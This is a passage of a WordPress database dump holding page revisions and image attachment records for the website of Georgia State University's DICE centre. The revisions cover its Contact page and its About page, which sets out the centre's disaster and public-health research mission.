15:45:31','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c4\",\"parentId\":\"185-c3\",\"partialId\":185,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"185-c4\",\"index\":0,\"id\":\"185-c5\",\"partialId\":185,\"styleRef\":400,\"type\":\"content\",\"props\":{\"content\":\"Contact Us\"}},{\"name\":\"hop-text\",\"parentId\":\"185-c4\",\"index\":1,\"id\":\"185-c6\",\"partialId\":185,\"styleRef\":401,\"type\":\"content\",\"props\":{\"content\":\"<p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;<\\/p><p>Phone:&nbsp;(404) 919-0757<br>Email: dice@cs.gsu.edu<\\/p>\"}}],\"styleRef\":398,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}}}}},\"id\":\"185-c7\",\"parentId\":\"185-c3\",\"partialId\":185,\"styleRef\":406,\"type\":\"content\"}],\"id\":\"185-c3\",\"parentId\":\"185-c2\",\"partialId\":185,\"styleRef\":397,\"type\":\"content\"}],\"id\":\"185-c2\",\"parentId\":\"185-c1\",\"partialId\":185,\"styleRef\":396,\"type\":\"content\",\"props\":{\"anchor\":false,\"name\":\"Content\",\"attrs\":{\"id\":\"content\"}}}],\"id\":\"185-c1\",\"partialId\":185,\"styleRef\":395,\"type\":\"content\"}','','','inherit','closed','closed','','546-revision-v1','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',546,'https://gsudice.dataconn.net/?p=958',0,'revision','',0),(959,1,'2022-04-08 11:45:31','2022-04-08 15:45:31','<div data-colibri-id=\"185-c1\" class=\"style-395 style-local-185-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"185-c2\" id=\"content\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-396 style-local-185-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"185-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-397 style-local-185-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-398-outer style-local-185-c4-outer\">\n            <div data-colibri-id=\"185-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-398 style-local-185-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"185-c5\" class=\"h-global-transition-all h-heading style-400 style-local-185-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-400 style-local-185-c5\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Contact Us</h2>\n                  </div>\n                </div>\n                <div data-colibri-id=\"185-c6\" class=\"h-text h-text-component style-401 style-local-185-c6 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>We are located on the 18th Floor of 25 Park Place at the Georgia State University downtown campus.&nbsp;</p>\n                    <p>Phone:&nbsp;(404) 919-0757\n                      <br>Email: dice@cs.gsu.edu</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-406-outer style-local-185-c7-outer\">\n            <div data-colibri-id=\"185-c7\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-406 style-local-185-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Contact','','inherit','closed','closed','','185-revision-v1','','','2022-04-08 11:45:31','2022-04-08 15:45:31','',185,'https://gsudice.dataconn.net/?p=959',0,'revision','',0),(965,1,'2022-04-14 10:12:24','2022-04-14 14:12:24','','Emma','','inherit','open','closed','','emma','','','2022-04-14 10:12:24','2022-04-14 14:12:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Emma.jpg',0,'attachment','image/jpeg',0),(966,1,'2022-04-14 10:12:33','2022-04-14 14:12:33','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg','cropped-Emma.jpg','','inherit','open','closed','','cropped-emma-jpg','','','2023-10-13 10:06:24','2023-10-13 14:06:24','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg',0,'attachment','image/jpeg',0),(974,1,'2022-04-14 10:22:43','2022-04-14 14:22:43','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp','','inherit','open','closed','','cropped-cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-1-webp','','','2022-04-14 10:22:43','2022-04-14 14:22:43','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp',0,'attachment','image/webp',0),(976,1,'2022-04-14 10:22:49','2022-04-14 14:22:49','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-14 10:22:49','2022-04-14 14:22:49','',353,'https://gsudice.dataconn.net/?p=976',0,'revision','',0),(977,1,'2022-04-14 10:22:49','2022-04-14 14:22:49','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Our Mission</h4>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n            <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-14 10:22:49','2022-04-14 14:22:49','',122,'https://gsudice.dataconn.net/?p=977',0,'revision','',0),(982,1,'2022-04-14 11:23:06','2022-04-14 15:23:06','','disaster','','inherit','open','closed','','disaster','','','2022-04-14 11:23:06','2022-04-14 15:23:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/disaster.jpg',0,'attachment','image/jpeg',0),(983,1,'2022-04-14 11:23:19','2022-04-14 15:23:19','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster-scaled-1.jpg','cropped-disaster-scaled-1.jpg','','inherit','open','closed','','cropped-disaster-scaled-1-jpg','','','2022-04-14 11:23:19','2022-04-14 15:23:19','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster-scaled-1.jpg',0,'attachment','image/jpeg',0),(985,1,'2022-04-14 11:23:25','2022-04-14 15:23:25','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-14 11:23:25','2022-04-14 15:23:25','',353,'https://gsudice.dataconn.net/?p=985',0,'revision','',0),(986,1,'2022-04-14 11:23:25','2022-04-14 15:23:25','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch 